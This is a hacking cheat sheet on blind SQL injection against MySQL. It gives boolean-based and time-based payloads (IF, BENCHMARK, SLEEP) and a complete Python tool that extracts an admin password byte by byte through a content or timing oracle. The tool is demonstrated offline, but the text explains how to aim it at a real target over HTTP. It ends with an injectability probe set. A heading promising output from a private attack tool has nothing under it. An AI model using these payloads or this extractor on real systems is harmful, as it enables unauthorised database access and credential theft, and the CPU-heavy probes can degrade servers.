Hacking - SQL Injection - MySQL - Blind SQL Injections

About Blind SQL Injections

In a reasonably well-built production application you generally cannot see error messages or query output in the response, so you cannot extract data with UNION or error-based attacks. You have to fall back to Blind SQL Injection, which recovers data one true/false question at a time. There are two kinds of blind SQL injection.

In normal (boolean-based) blinds the page content differs between a true and a false condition, so you can use IF() or abuse the WHERE clause of the injected query (generally easier).

In totally blind cases the response looks the same either way, so you need to make the database wait and compare response times. In MySQL you can use BENCHMARK() or SLEEP(10) for this.

Real and a Bit Complex Blind SQL Injection Attack Sample

This output was taken from a real, private Blind SQL Injection tool while exploiting a SQL Server backed application and enumerating table names.


Making Databases Wait / Sleep For Blind SQL Injection Attacks

Use this only when the injection is totally blind; otherwise a condition that changes the page content or raises an error is faster. Note that in a MySQL SELECT, 1/0 evaluates to NULL with a warning rather than raising an error, so a division-by-zero probe does not work there the way it does on other databases.

Be careful with delays longer than 20-30 seconds: the database API connection or the script itself may time out, and a timed-out request is indistinguishable from a true result.

BENCHMARK()

Basically, we are abusing this function to make MySQL wait a bit. Be careful: each probe keeps a database CPU core busy for the whole delay, so a handful of parallel probes will exhaust the server's CPU and connection limits very quickly. SLEEP() idles instead of burning CPU and is preferable where it is available.

BENCHMARK(count, expression)

Evaluates expression count times and returns 0; the elapsed time is the only signal. Calibrate count on the target first, because MD5 throughput differs between hosts.

Are we root?

IF((SELECT COUNT(*) FROM users WHERE username = 'root') > 0, BENCHMARK(1000000000,MD5(1)), 0)

This checks the application's users table for a 'root' row. To test which database account the injection runs as, compare CURRENT_USER() instead. MySQL has no standalone IF ... THEN statement outside stored programs, so inside an injected expression use the IF(condition, then, else) function as above. A billion iterations can run for minutes, so start with a smaller count.

Check Table exist in MySQL

IF((SELECT COUNT(*) FROM login) >= 0, BENCHMARK(1000000,MD5(1)), 0)

If the login table exists the condition is always true and the response is delayed; if it does not, the whole statement fails on the unknown table and the response comes back immediately.
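The two kinds of blind extraction described above (content-based and timing-based), as an added example that is not part of the original cheat sheet: MySQL payloads that ask one question about one byte of a subquery result, a binary search that needs eight questions per byte, and the two oracles (page marker, response latency) that drive it. The users and products tables, the admin row, the password column and the "Book found" marker are assumptions, and the SQLite-backed stand-in application, with the MySQL functions ORD, MID and SLEEP emulated, is constructed so the script runs offline. The time payload is written with CASE WHEN, which MySQL accepts and which is equivalent to IF(condition, SLEEP(n), 0); CASE is used because SQLite evaluates it lazily, as MySQL does, so the stand-in only sleeps on a true condition.

```python
import sqlite3
import time
from typing import Callable

# Subquery whose result is read out byte by byte (table and column names are
# assumptions for this example).
SUBQUERY = "SELECT password FROM users WHERE username='admin'"


def boolean_payload(subquery: str, pos: int, threshold: int) -> str:
    """Normal blind: appended to a string parameter, the WHERE clause stays true
    only if byte `pos` (1-based) of the subquery result is > threshold."""
    return f"' AND ORD(MID(({subquery}),{pos},1))>{threshold}-- -"


def time_payload(subquery: str, pos: int, threshold: int, seconds: float) -> str:
    """Totally blind: same condition, but the only signal is the delay.  MySQL
    shorthand is IF(cond,SLEEP(n),0); BENCHMARK(n,MD5(1)) replaces SLEEP() on
    servers that lack it."""
    return (f"' AND (CASE WHEN ORD(MID(({subquery}),{pos},1))>{threshold} "
            f"THEN SLEEP({seconds}) ELSE 0 END)-- -")


def extract(ask: Callable[[int, int], bool], max_len: int = 64) -> str:
    """ask(pos, threshold) answers "is byte pos > threshold?".  Binary search
    over 0..255 costs eight questions per byte; ORD(MID(...)) past the end of
    the string is 0, which terminates the loop."""
    out = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 255
        while lo < hi:
            mid = (lo + hi) // 2
            if ask(pos, mid):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out.append(chr(lo))
    return "".join(out)


def boolean_oracle(send: Callable[[str], str], subquery: str, true_marker: str):
    """send(payload) returns the page body; the marker appears only on 'true' pages."""
    return lambda pos, thr: true_marker in send(boolean_payload(subquery, pos, thr))


def time_oracle(send: Callable[[str], str], subquery: str, seconds: float):
    """Classify by latency; keep `seconds` well below any connection timeout."""
    def ask(pos: int, thr: int) -> bool:
        started = time.monotonic()
        send(time_payload(subquery, pos, thr, seconds))
        return time.monotonic() - started >= seconds / 2
    return ask


def make_stand_in(secret: str) -> Callable[[str], str]:
    """Constructed vulnerable application backed by SQLite so the example runs
    offline.  The MySQL functions the payloads rely on are emulated here."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(username TEXT, password TEXT);
        CREATE TABLE products(id INTEGER, name TEXT);
        INSERT INTO products VALUES (4, 'Book');
    """)
    db.execute("INSERT INTO users VALUES ('admin', ?)", (secret,))
    db.create_function("ORD", 1, lambda s: ord(s[0]) if s else 0)
    db.create_function("MID", 3, lambda s, p, n: (s or "")[p - 1:p - 1 + n])
    db.create_function("SLEEP", 1, lambda n: (time.sleep(n), 0)[1])  # returns 0 like MySQL

    def send(payload: str) -> str:
        # The parameter is pasted straight into the query: product.asp?name=Book<payload>
        sql = f"SELECT name FROM products WHERE name = 'Book{payload}'"
        rows = db.execute(sql).fetchall()
        return "Book found" if rows else "No such product"
    return send


def demo(secret: str = "s3cret!", seconds: float = 0.02):
    """Recover `secret` twice: from page content, then from delay alone."""
    send = make_stand_in(secret)
    by_content = extract(boolean_oracle(send, SUBQUERY, "Book found"))
    by_delay = extract(time_oracle(send, SUBQUERY, seconds))
    return by_content, by_delay


if __name__ == "__main__":
    print(demo())
```

Against a real target, send() is the HTTP request with the payload URL-encoded into the vulnerable parameter, and the time-based oracle should be calibrated with a few true and false probes first so that network jitter does not flip answers; the binary search has no error correction, so one misclassified question corrupts the byte.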

Clear SQL Injection Tests

These tests are simple and useful for blind SQL injection and for silent (low-noise) probing: send the original value, an expression the database should evaluate to the same value, and a tautology, then compare the three responses. If the expression gives the same page as the original and the tautology gives a different one, the parameter is being evaluated as SQL.

product.asp?id=4
  product.asp?id=5-1
  product.asp?id=4 OR 1=1 
 
product.asp?name=Book
  product.asp?name=Bo'%2b'ok
  product.asp?name=Bo' || 'ok 
  product.asp?name=Book' OR 'x'='x

%2b is a URL-encoded '+', which is string concatenation on SQL Server; || is concatenation on Oracle and PostgreSQL, but in MySQL it is logical OR unless sql_mode contains PIPES_AS_CONCAT. For MySQL use adjacent string literals, which it concatenates: product.asp?name=Bo' 'ok.
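The three-request test above, as an added example that is not from the cheat sheet: a SQLite stand-in for product.asp (the products table and its rows are assumed) with one vulnerable and one parameterised lookup per parameter type, and a checker that compares the baseline, the equivalent-expression and the tautology responses. SQLite concatenates with || natively, so the string test here uses Bo'||'ok; against MySQL, where || is logical OR by default, use Bo' 'ok instead.

```python
import sqlite3
from typing import Callable, Dict, List


def make_app() -> Dict[str, Callable[[str], List[str]]]:
    """Constructed stand-in for product.asp: vulnerable lookups paste the
    parameter into the SQL, the *_safe ones bind it as a parameter."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT);
        INSERT INTO products VALUES (4, 'Book'), (5, 'Pen'), (6, 'Lamp');
    """)

    def rows(sql: str, params=()) -> List[str]:
        return [r[0] for r in db.execute(sql, params)]

    return {
        # product.asp?id=...    numeric parameter, no quotes around it
        "by_id": lambda v: rows(f"SELECT name FROM products WHERE id = {v}"),
        # product.asp?name=...  string parameter inside single quotes
        "by_name": lambda v: rows(f"SELECT name FROM products WHERE name = '{v}'"),
        "by_id_safe": lambda v: rows("SELECT name FROM products WHERE id = ?", (v,)),
        "by_name_safe": lambda v: rows("SELECT name FROM products WHERE name = ?", (v,)),
    }


def response(fetch: Callable[[str], List[str]], value: str) -> object:
    """What the tester sees; a database error is just another distinct response."""
    try:
        return tuple(fetch(value))
    except sqlite3.Error as exc:
        return f"error: {exc}"


def looks_injectable(fetch: Callable[[str], List[str]],
                     baseline: str, equivalent: str, tautology: str) -> bool:
    """Three requests.  `equivalent` must evaluate to the same value as
    `baseline` if the database sees it as SQL (5-1 for 4, Bo'||'ok for Book);
    `tautology` widens the WHERE clause.  The parameter is injected when the
    equivalent form returns the baseline page and the tautology does not."""
    base = response(fetch, baseline)
    return response(fetch, equivalent) == base and response(fetch, tautology) != base


if __name__ == "__main__":
    app = make_app()
    for name in ("by_id", "by_id_safe"):
        print(name, looks_injectable(app[name], "4", "5-1", "4 OR 1=1"))
    for name in ("by_name", "by_name_safe"):
        print(name, looks_injectable(app[name], "Book", "Bo'||'ok", "Book' OR 'x'='x"))
```

The parameterised lookups fail the test because "5-1" and "4 OR 1=1" are compared as literal values and match nothing, which is exactly the difference the three-request probe is designed to detect.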